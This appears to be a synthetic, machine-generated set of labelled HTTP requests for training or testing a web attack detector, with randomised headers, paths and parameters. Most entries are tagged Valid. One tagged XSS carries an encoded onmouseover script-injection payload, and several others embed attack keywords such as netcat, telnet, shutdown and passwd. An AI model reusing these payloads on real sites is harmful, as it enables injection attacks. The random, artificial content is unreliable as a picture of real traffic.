X-Forwarded-For: 242.120.138.182
X-Serial-Number: 3885571205
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16452
Start - Id: 16375
class: Valid
GET /e82QOPDTSvb0eqjL/cpZS/nxTCyzWLh8iGyZFu9P8z.htm?kecdr=Nadminyyrta%5D&eedHrMi6ee4=cbo%277e1ex%5ClhTn&girmemorapotE=tincludeOtmpshn+shutdown%25v%7CSa&TEKPQs=orcpt&irtva=uKgP3G86ykE&cesnmtci9he=2186295&1-pvmJAmaccess_logH0t=script&inonPteyt9eene=8Aotalds&iesH=2&icia=07731406&stgRlOd=19596&dia=mlub75CXr&aptReE61cp=+%3FsW&92Pk@L=%3Fus&setl=dtrwxs HTTP/1.0
Host: www.direB.cz:80
Connection: close
Accept: text/*, text/plain;q=0.4
Accept-Charset: iso-8859-2, isiri-3342, x-mac-arabic;q=0.2, euc-kr, big5
Accept-Encoding: identity, deflate;q=0.6, gzip, gzip;q=0.0, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 240.84.81.255
Cookie: v2eoaetaatislnE=56098
Cookie2: $Version="6"
Date: Thu, 25 Jan 07 13:40:44 GMT
ETag: "UQpj0l.t2C.cLR5g"
Expect: 100-continue
From: 6Inrs@onnmi15ye.gov
If-Modified-Since: Sat, 21 May 05 11:55:21 UTC
If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: *
If-None-Match: *
If-Range: "98Jl2PaAbAcfXWZVDQr"
Max-Forwards: 7
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic b2Z5bklpNTpnZnNkRA==
Authorization: NTLM clJ0bmk1bGVlODRzdWllbmRla2U1ZTF1aWVlYWFlZXRsYWF6ZG56OWNqOXRhYXRu
Range: -652120,9-,091-
Referer: /tanAeti/oijvez6/ndNwum.msf
TE: chunked;q=0.7,gzip;q=0.0,trailers
Trailer: Via
User-Agent: tinaknzuh/8.1.9
UA-CPU: MIPS
UA-Disp: 565,1583,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 942x4490
Via: 1.5 www.rs1rthZ.jpeg
Transfer-Encoding: identity
Upgrade: 2qpnf/0.0, mrmr/9.5, uql/4.8, rtnga/2.2, nj9ne/2.7
Warning: 329 87.131.7.58 "oEshdty0oueiapofites" "Wed, 28 Nov 07 21:16:00 GMT"
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16375
Start - Id: 5705
class: Valid
PUT /ue83tE4M/hLDNB/dlaetos1lkaaszzl/tapoamfeeso/rt/to4ia8Llc1queoui.js? HTTP/1.0
Content-Length: 106
Content-Language: lan
Content-Encoding: compress
Content-Location: /sdAt/5tbitwsj.cfm
Content-MD5: b3VydG5nbHNvc3NkdGFBYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 May 08 17:20:24 CET
Last-Modified: Tue, 16 Jan 07 17:27:18 GMT
Host: www.tntNgaeUtr.ch:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: r-d7UseIr, Aerouiut-iecbyei;q=0.1, tadeS-t;q=0.6, toez-mt3a;q=0.7, 9eIninr-soas
Cache-Control: only-if-cached
Client-ip: 1.110.220.47
Cookie: tNahbzeuAr=+ehn3s uhi;0rhfm9trettcsw=pe;Rotlms=4335460;7zformX@perluKyZm=5Ieep7;oums=3711620
Cookie2: $Version="819"
Date: Sun, 05 Jun 05 03:12:46 CET
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: jdYeaesr@naae.de
If-Modified-Since: Mon, 30 Jun 08 16:05:56 UTC
If-Unmodified-Since: Mon, 31 Mar 08 01:29:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9437
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="EF4ECf02FCB0B3A3dBCfC57Ba47ABc57"
Authorization: aachtf avhue=bPeee
Range: 40090-
Referer: /T3neam/b8oet/PtkjaCe.swf
TE: deflate,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 3.6; oi-Rn; rv:1.8.4) Gecko/64082018
UA-CPU: 68000
UA-Disp: 1912,4963,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 327x1132
Via: 4.6 46.205.33.112, FTP/2.5 www.uuriec.gif
Transfer-Encoding: gzip
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 862 198.32.164.214 "elois" "Mon, 15 Jun 09 05:39:31 UTC"
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

aeuitI8hDrrelrw=trpsnde&15Uleoe=elcenEl&nhv=853479&dsOAotrews=t2is&NeRtstow4=565276959&EyrshtagGO=ihxuinUt

End - Id: 5705
Start - Id: 15693
class: Valid
GET /olN3pafe@q7r/n9ltkeMsiHyr/UqGBF.pl?_W5emKRDZl=r&YNUVbg=lUp9Xgn&c8ypbaeThoi9dp=tsyscutarehgdc5N96&at7=25256&nmfe=j3IeDuTZm&aGzas=pnDneenpdulo&jys6smIw=rs&hn=m%28s-8+ori&veaaoeccz=insertnhaving%22o%22+%26dtelnetaP%5Dlikehbt&ha=156&eggsnnSbac=97990696&desteloto=17&rrhr8cndme=ih05%40Ek9 HTTP/1.0
Host: www.pngrmepr.cz
Connection: close
Accept: text/*;q=0.1, text/plain;q=0.3, video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: nO-yw;q=0.6, afexdde9-re;q=0.9, e-2nrbcliu, 4is-stsi, seNo-agpts;q=0.4
Cache-Control: no-cache
Client-ip: 136.239.165.237
Cookie: ssaoo5trmt=s@Yh2@G6
Cookie2: $Version="5"
Date: Tue, 09 Aug 05 15:27:15 GMT
ETag: "maJA2_Zos4QuSvc0B.kE"
Expect: adapRas=stI4
From: aidedtls@ci4kCcst.biz
If-Modified-Since: Sat, 03 Apr 10 09:28:44 UTC
If-Unmodified-Since: Tue, 28 Sep 04 16:27:28 UTC
If-Match: "N_foGuJNVJWh9pn"
If-None-Match: "Jy.qTiW@KTqLAeeqN"
If-Range: Sun, 27 May 07 21:31:52 CET
Max-Forwards: 05
MIME-Version: 6.2
Pragma: ihaiT=ugotbzn
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: Basic c2kxRGk6bnQ1dG9vRQ==
Range: -2
Referer: /70cttets/nnEo1/aglaaa/nios/eFxahe.jpeg
TE: chunked
Trailer: Trailer
User-Agent: hkol9iOE/5.2.0.6
UA-CPU: StrongARM
UA-Disp: 9331,266,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8122x873
Via: 0.5 www.enEhth0f.jpg, HTTP/2.5 www.dsftcc.jpeg, FTP/4.5 61.136.171.69
Transfer-Encoding: compress
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 451 194.177.41.7 "maNtqhbf" 
X-Forwarded-For: 23.70.171.229
X-Serial-Number: 9307845835407773
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15693
Start - Id: 27350
class: Valid
GET /47nH26/iBe0cRcp/ml7@Mvudpb2pObV9do/Mw/wK7aBF0fGgayN3pX-._3/k_ZXHysjjG3s8J1RCSt.css?0hTudrh=on3u3VY7&ybUEnin=tDm&ro2hvwa=%28d%28%29opt2e&eeahltjg=30&andqhJvmf5ooi=daeunc7&ndsnmhnoahh=847&2ait5=9irnzd&GaLme=+ebrn&xxDssem=itteux&f8otelsifljqcg=id%3Coshavingo%29systemE0lmnOs%5D%5D&dejLid64enad=85171195&htoanraa0nAPDrs=0&6omqpefenuE=0t1rA9al&vartV6styleXx=wWm&XecI1=ayaL HTTP/1.1
Host: www.ea78t.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: compress, gzip
Accept-Language: siOn-te;q=0.4
Cache-Control: only-if-cached
Client-ip: 8.61.2.31
Cookie: weutsios8=594
Cookie2: $Version="5"
Date: Sat, 28 Feb 04 12:59:14 CET
ETag: "pm0qX1UWQS-2VPXtbZ-"
Expect: 100-continue
From: irasr@udahB.net
If-Modified-Since: Mon, 26 Feb 07 15:38:09 GMT
If-Unmodified-Since: Sat, 13 Oct 07 06:06:03 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Oct 08 18:38:33 UTC
Max-Forwards: 01
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic b2FlYTpkaXR1aXJzcw==
Authorization: tworda arewplt5=fasrH
Range: 990051-0235,8-,3996-58
Referer: /5cjm1o/nijusdn/iyoo7/mncdreP1/ao3t.js
TE: trailers,deflate;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/5.2 (compatible; MSIE 1.2; Unix; e1lprosy; 5irfa; bRranrtm)
UA-CPU: 68000
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 904x688
Via: 1.7 www.ae8s.js, HTTP/5.4 90.9.66.56, 7aJdsz/4.0 163.170.108.25
Transfer-Encoding: efgIre
Upgrade: oygdhG/5.2, mkl/7.7, atrtbx/4.3, rRu4lt/4.7
Warning: 512 www.aenedr.jpg:10948 "eegrnttldlzoehyooi5" "Tue, 07 Dec 04 04:16:31 GMT"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27350
Start - Id: 2354
class: Valid
GET /TvPBNkj/v3wwiC8e2/ndccetda/doefNWlcoe/smo/oeetyteaooh8/yZPL68Z.sHx0Z0ojhy/ohLnp/iOt/cv@zr_y/nfoNQ9nbrg.exe?sN=gex4r&cdbrtSdcWu=ag+d&s2e=nLe_Mk%406b&rctlraaus=hjgnsZrwnre&UxcMhKF0Bo=b5rordeeRedieI&eiyaifqdtorwtQe=amgnerlgl-d&7dv5cs=cWs&GqeLRG8gV=2395267031&ssaeDBy=stdiny&tfee=d.2yer&aaa9ezhswonR8sO=8rnaunionenck&uoi1btefioGe=263 HTTP/1.0
Host: www.eSnnerotno.com:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: x-mac-icelandic, x-mac-hebrew, iso-2022-kr
Accept-Encoding: 
Accept-Language: slaehi-n;q=0.9, eSDqlena-s;q=0.6
Cache-Control: no-store
Client-ip: 235.124.196.175
Cookie: ee=an;j3jh9do=6OLaSL;ntUtrmanhnr=m a;8mUei=linkhooierefaa;DafI0tZ=824870
Cookie2: $Version="470"
Date: Wed, 16 Jun 04 18:24:21 CET
ETag: "5c7-vNXIuqgiPYh_yhiq"
Expect: 100-continue
From: snqoqaol@8oEvmf8efw.org
If-Modified-Since: Wed, 07 Jul 04 16:25:19 CET
If-Unmodified-Since: Sun, 24 Jun 07 24:36:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.5
Pragma: lel='ttdn'
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Donf itkuRE=wtgc
Range: -6000,-150
Referer: http://tshoNfnn.de/E8llytnl/6eAeah/vOvtytwn/irtit1e/mrdha.htm
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 5.5; rs-ne; rv:3.1.9) Gecko/10910244
UA-CPU: PowerPC
UA-Disp: 6863,178,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3780x3384
Via: FTP/5.3 160.215.90.68:39
Transfer-Encoding: compress
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 090 www.phtammg.png "tsieHnlufsaN" 
X-Forwarded-For: 9.20.198.184
X-Serial-Number: 67775
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2354
Start - Id: 47151
class: XSS
GET /s2/naiWCtzhIzdOt/eBY-4@gCIlr-rw/dLqagi24kq6Ls.htm?vys=tsm7ZP5J&on=nvtsaabk6&aaos8htho4=4599505&lstpsau=eGmT&itiw=ay2oen739&eeeeheED=868&42ee79srt=re8ch%5DdsfdRdh&loghomelike6T=%3Cdiv++++onmouseover++%3D++%22+++%5Balert+++%28%27snEeihj%27%29%3B%5D+++%22++++%3E&mEhRuUathseafdt=10&sgieseah=4e&aer1e=uo+zl%3C&nbo=aht&uInki7a=8316778 HTTP/1.1
Host: 169.84.178.187
Connection: rmmvw
Accept: image/*;q=0.3
Accept-Charset: euc-cn, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Mon, 21 May 07 13:13:53 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: tnrpsa=tPsspxH
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Sun, 17 Jul 05 06:23:52 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Fri, 23 May 08 02:14:43 UTC
Max-Forwards: 317
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Digest realm
Range: -016,1-,67332-47295
Referer: /ipevtdo1.bin
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 8.7; t2-tE; rv:2.0.6) Gecko/40557144
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 4.8 140.128.117.70
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 133 www.sgmoeN.htm "nctpp" 
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 155966371996
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 47151
Start - Id: 19698
class: Valid
GET /atitoDtdntfhi2gbg/ssOoc35qkt1s/e4nATv2YKF/HlZeeslhcslkn0/tee8aex4mktLs/scehzfeO3ee/n5LchildQW5YD/dE8tenyaeiv5rncArmlr/X1acceptuuZFVEvdXg./vtziox2.html?anise0ai3tiC=asach&A_KePT=sr9LGEUR&iIkg=3&_HkJj=65540649&t4mdccarie=214&70g9dBa=xalyxlnoaaico&d1l4iaesa=2909330260 HTTP/1.0
Host: 163.32.99.240
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-8;q=0.6, koi8;q=0.3, windows-1258;q=0.5, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=1340
Client-ip: 189.62.159.142
Cookie: ek=5;L_incopy=580286;7h=nJC8ZDr@M
Cookie2: $Version="138"
Date: Tue, 11 Sep 07 24:19:50 GMT
ETag: "eEdcWMNNX4bKI0hGF4"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Mon, 13 Feb 06 18:00:18 GMT
If-Match: *
If-None-Match: "LL1msfManbsY@hStL"
If-Range: Wed, 24 Dec 08 23:55:11 GMT
Max-Forwards: 37
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: is6eir e7Od1r=qus9thtv
Authorization: Basic ZGVhU3Q6c3RyRWRPb1M=
Range: -6,-1,-676621
Referer: /8csr/o7M0h0.mspx
TE: trailers,deflate;q=0.2,trailers
Trailer: Authorization
User-Agent: cxafinerloc
UA-CPU: PowerPC
UA-Disp: 822,055,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 947x1810
Via: 7.1 www.rs0tso3t.jpeg, 3.2 www.lIei3at2.shtml
Transfer-Encoding: deflate
Upgrade: leeo/7.8, ciiam/4.0, wtx/5.6, u8e/9.4
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 103.115.185.154
X-Serial-Number: 7592797493312
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19698
Start - Id: 22969
class: Valid
GET /tl@OuZ8DTW48Ps_Zh/h5/6sbp/e.U.D1vsst4t0y2g/eD1insert/oX60PUmg.gBhCqzZm/e2kZpFbbJ6x16UN8Y/tsv_C_Iy0nT4TBbQwXG/cktee5ql3n.asp?84QgyNU0djHrO=ri6eEstMlfnV&HWhannprsi=o&maaDmhldhlse=ON53a&esakLn=group+bys%24us+0d&G2rIlogEVb=Rter8&cisxtrtt=gn%40 HTTP/1.0
Host: 13.207.209.83
Connection: keep-alive
Accept: image/gif, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wffeDao-in, OI-Othvp6;q=0.0, 5eint-S
Cache-Control: no-transform
Client-ip: 237.229.255.165
Cookie: sehlu=ai<EtN;9SZGQboC=1540197316
Cookie2: $Version="724"
Date: Thu, 06 Jan 05 19:09:22 CET
ETag: W/"Ybo7-Iu_ZahsEYGybIT"
Expect: 100-continue
From: ap2o@ettoab6r.com
If-Modified-Since: Thu, 13 Oct 05 08:54:23 GMT
If-Unmodified-Since: Sun, 11 Mar 07 21:12:02 CET
If-Match: "643EI@VOJ4NjeCM"
If-None-Match: *
If-Range: Sun, 02 Dec 07 05:07:54 GMT
Max-Forwards: 08
MIME-Version: 2.6
Pragma: dme=yttc
Proxy-Authorization: Basic aGhhcjppZTJp
Authorization: Digest response="A20b0dBe214babFaAC8A4B1A1CfED9A1"
Range: 31732-,84218-
Referer: /bMkmlfm.php4
TE: chunked;q=0.7
Trailer: Pragma
User-Agent: Mozilla/9.6 (compatible; seBczue; Open BSD i586; uNjrie; aOiy)
UA-CPU: x86
UA-Disp: 052,5191,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 159x1338
Via: slrc/3.4 www.medi.jpeg:732
Transfer-Encoding: gzip
Upgrade: sisan/8.7, FrNm/6.3, a2dct/4.1, dtwn/4.7
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22969
Start - Id: 12686
class: Valid
GET /aVioO0IkXrCP_j7/shmoyfriMtsokvdqet/eoksaRnshRtuai/mE8UC5@tWoB_RVa/imLtromy/bdnqemisOsng/QhtMZC/cmP1U_tJ/liBd8BwJSsw4wtdD/aWl8/eyrnSt/6zVKHwpIcgHLOd3@t2b.dll?1xaKaMvhomeOOLa=abnbvesir0lNjrhos&bsU6iIl=90&9tnew8nwnhoajne=668&alkg1tlrvsdn=n1laaxe&heo=7&lgnaeb5=bEi3esusyoetiuseoe HTTP/1.0
Host: 166.34.96.105
Connection: keep-alive
Accept: text/*, text/xml, application/*
Accept-Charset: windows-1257, x-mac-chinesesimp;q=0.8
Accept-Encoding: gzip;q=0.8
Accept-Language: eeuY-im5
Cache-Control: no-store
Client-ip: 40.108.235.175
Cookie: edn=01;sa9Eeqoy=54441870;cDW_=nodetmp;dtT3idwreoii=rRu
Cookie2: $Version="994"
Date: Thu, 10 Aug 06 03:17:39 UTC
ETag: W/"xjQfWzKIIQX-LrrXn"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Tue, 15 Feb 05 12:15:59 CET
If-Unmodified-Since: Thu, 18 Sep 08 13:46:43 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 15:54:55 UTC
Max-Forwards: 72
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: Digest opaque="ietniT"
Range: 123920-
Referer: /Asiee/otglo1n.pdf
TE: trailers
Trailer: If-Match
User-Agent: tzEE2P1zyy http://www.cyae.org
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: FTP/1.3 194.28.181.172, 6.8 81.46.251.78, HTTP/0.3 71.196.98.191
Transfer-Encoding: identity
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 641 www.nTPq.png "nteo1bei1ie" "Sat, 05 Apr 08 24:06:12 UTC"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12686
Start - Id: 16829
class: Valid
GET /qQb1sh0/n2sestob/iS3NrWwJTVDXReGRI/exMA_.zuMh9BmO9b8ka/ige/nsnhbvteoatsr4/Ncbw/Iehe1sumteaceo/2idq/so40tmdo5xiliyrhrr/n5MWjf0ol/e-zn-YgiEUxPdG5RjA.js?lhbovsioesuyci=bk&rrdyaIete=615&uEavgeuiebn=%5Br%5B6dropcfconnect%25yeOM&knosl=acht&abnn=1s&gJ-xml=YttinputebrehNa&qpasswdmd=to%2Brndccuyoo&dgv13zdato=75259&Urs=47403936&3eisgatAaiRn=irect&LBNw=asefa&oUlwaltaain=rl0pwaj7s4&ewaec9t0ogad7D=swherevel88rolmcexecsIesoe&reeenrxtt=r4Eiaotmvmolrt34&rj=6880779 HTTP/1.0
Host: 49.69.251.124:59002
Connection: close
Accept: text/xml, audio/basic
Accept-Charset: *
Accept-Encoding: identity;q=0.9, deflate
Accept-Language: *;q=0.3
Cache-Control: max-age=35443
Client-ip: 191.252.224.226
Cookie: zaf=t1;Tiugtiso8evtsf=54202558;iwvIvLI8vPx8=nsohaimt7]gfoErrs;eaesdrAotiro0aj=$e+cbetween;pGVIcifYEJ9t=];wnOc=mSNe
Cookie2: $Version="7"
Date: Mon, 21 Apr 08 09:56:08 UTC
ETag: "itjXOwKf@iA@iiML87g"
Expect: ttlun=eoothpgi
From: sLreap3i@a64Yedt.be
If-Modified-Since: Sat, 23 Jul 05 17:42:43 GMT
If-Unmodified-Since: Fri, 30 May 08 05:02:35 GMT
If-Match: *
If-None-Match: "Rv9RXRDpttAjaUwk"
If-Range: *
Max-Forwards: 130
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest username="lfoxlnn"
Authorization: Digest username="XaJls"
Range: 9-87181
Referer: /eetmho/miiea.jpg
TE: deflate;q=0.7
Trailer: If-Range
User-Agent: nAa8/8.6.9.6
UA-CPU: StrongARM
UA-Disp: 952,004,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 818x5345
Via: HTTP/0.2 www.tmesb.js
Transfer-Encoding: n5Te; fijOqqai=Qd4ufGr
Upgrade: lenv/1.1, ndi/4.7
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16829
Start - Id: 1124
class: Valid
GET /drNtxAoen/ike70/Stohpnote1wtdf/Gs83mochal7luoIN/V1YNXyQu..mspx?alseyalIasEsd=cmaot%5Cb3wdad%3Dsamzpo+e&sq69oHDeieagb=5te&t3ao5snda=sdgHeu&tmlsvu=eecmcdperl+logtis+ornftcs&auR7ndrtanu=rEJ5&evrliss=2ir&nnez4etedepadm=45976995&ahN.LTV=8246&tEvE8we=winntqsnesx&MyoioOsactdnfn=a&docsdtscdhj=1ruellmen%25%5D HTTP/1.1
Host: www.e0trad.fr:98
Connection: close
Accept: video/mpeg;q=0.7, audio/*, text/plain
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.8, compress, gzip;q=0.8, identity;q=0.0, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.209.57.142
Cookie: Csetohy=yn5ez;sn=lj7;ttiasdSsauta=e ibid05zxaH~netcat;t2tdosa4nhi=awUJAXboVXO;Yincludez2BI=Txml
Cookie2: $Version="1"
Date: Thu, 09 Oct 08 04:52:14 CET
ETag: W/"BrnWe_tD.ul85FPfav"
Expect: nrsr
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: "mdbK@UUEFEQRBVE"
If-None-Match: "GOsXReGap-PUu5g"
If-Range: *
Max-Forwards: 84
MIME-Version: 9.9
Pragma: a='eahna'
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: NTLM cmV0ZXBtYjd0Q0VkbWYwYm9jQ3hlb1RoY3RuYWU2N3dsOHRJYQ==
Range: 634551-,48052-6687,-9
Referer: http://www.2phhbrr.be/nroqd/yhhia8r/oldel/ntmijt/sdfyrtn.pdf
TE: trailers,chunked
Trailer: Referer
User-Agent: shYxmho/5.1.2.5.0
UA-CPU: PowerPC
UA-Disp: 111,7924,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2688x3357
Via: 7.8 www.pauy8a.jpeg, oidBd/5.6 171.190.91.5, ayl/7.1 130.204.84.166:887
Transfer-Encoding: compress
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 212.205.31.150
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1124
Start - Id: 10391
class: Valid
GET /ibsndbwaFrTabnn.jsp?lytnltt=twtswrrlhtoehe5tte&ncewaeitNoh=677964&7rStl=0746&sfnohr=feoNnscedO&Oomtm=ceMFmo9&Xinura5ha8=hnmvartmlh&eS2nelefgay=10381028&bdw=%2Bn2m&er6sQ=%7E&ulr=92192633&2a67taer=w&UmfsHtOlhe=0903461810&syies8o=tClgNS7wt&selectFicQ=311483 HTTP/1.1
Host: 27.100.20.177:80
Connection: keep-alive
Accept: application/*, audio/basic;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: d0Ind-ghgcw;q=0.3, heE-lEt, i-dhrBxe;q=0.3, z-tonnShi, dst-6ngeB;q=0.1
Cache-Control: m=4fwim2nl
Client-ip: 202.195.254.224
Cookie: arson=]c5xsherx5ad div;tlal=62872
Cookie2: $Version="2"
Date: Sun, 26 Jul 09 22:46:01 UTC
ETag: "v66wH6t.9Hia1Yo@ld"
Expect: hxutl
From: miNkcO@dkleaiiild.de
If-Modified-Since: Fri, 18 Jul 08 16:19:56 UTC
If-Unmodified-Since: Wed, 03 Sep 08 15:35:31 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Sep 04 02:49:02 UTC
Max-Forwards: 50
MIME-Version: 3.9
Pragma: 6='u'
Proxy-Authorization: NTLM bk5mMWhvODhwR2VwaGlhZXM3c3hvZXJhc2h5Z25xaXRlbkp4Ym51eA==
Authorization: NTLM dGhOSHJkalFlZW1lbGVzZHlnbXA1bEVuZWFwNWVSc2hEYXVmOWJhdXQ3OA==
Range: 5-355295,61313-1,05930-37268
Referer: /m2yast/4easi/odhTb4.swf
TE: deflate;q=0.5,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/1.5 (compatible; MSIE 3.5; Linux i586; syeyiKca0i; 2h7atmN; xcoialu)
UA-CPU: MIPS
UA-Disp: 6128,5212,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: 5.8 15.181.12.98, 1.5 225.27.200.94, FTP/7.2 149.87.179.152:20
Transfer-Encoding: identity
Upgrade: ancy/1.0, oOo/8.7, dDaete/7.5, ezzr/0.0, esh/9.3
Warning: 822 228.131.4.69:6209 "vi23tean7alO" "Wed, 02 Dec 09 09:57:23 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10391
Start - Id: 32770
class: Valid
PUT /hFk/ncoeerhAesdenghri/tc3ccaHvL3tlhztnmCnn/1TBUayx/al/ShvEvUSADjkcmd/dLdOtvSeVUQuXiRIwwr/wLihKs9oWYmM/q2rv.exe? HTTP/1.1
Content-Length: 126
Content-Language: g
Content-Encoding: gzip
Content-Location: /euli/tinXweh.dll
Content-MD5: ZnNlaHVjZWRUb29sZm9hcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Mar 06 10:52:07 CET
Last-Modified: Thu, 11 Jan 07 23:23:06 GMT
Host: www.hdusi4tpwD.cz
Connection: re3ie
Accept: */*
Accept-Charset: windows-1258, euc-kr;q=0.7, x-mac-ce;q=0.7, cp-950, windows-1257;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 68.202.181.199
Cookie: 8Jhc=ijhoOeho;gh8eofhn=siulrDoseoenepocdn;eojc26eotrlip=7802963;pd5kjsijigla2rE=godm;ehLtEs=n4idhA
Cookie2: $Version="561"
Date: Sat, 27 Dec 08 15:37:46 CET
ETag: "iZ8m4dCHifFiyoUCsppk"
Expect: poeint
From: eadg@itnjs.uk
If-Modified-Since: Fri, 21 Aug 09 07:21:29 UTC
If-Unmodified-Since: Mon, 30 Mar 09 06:43:42 UTC
If-Match: *
If-None-Match: "PgEE45nfhz3fJoR"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
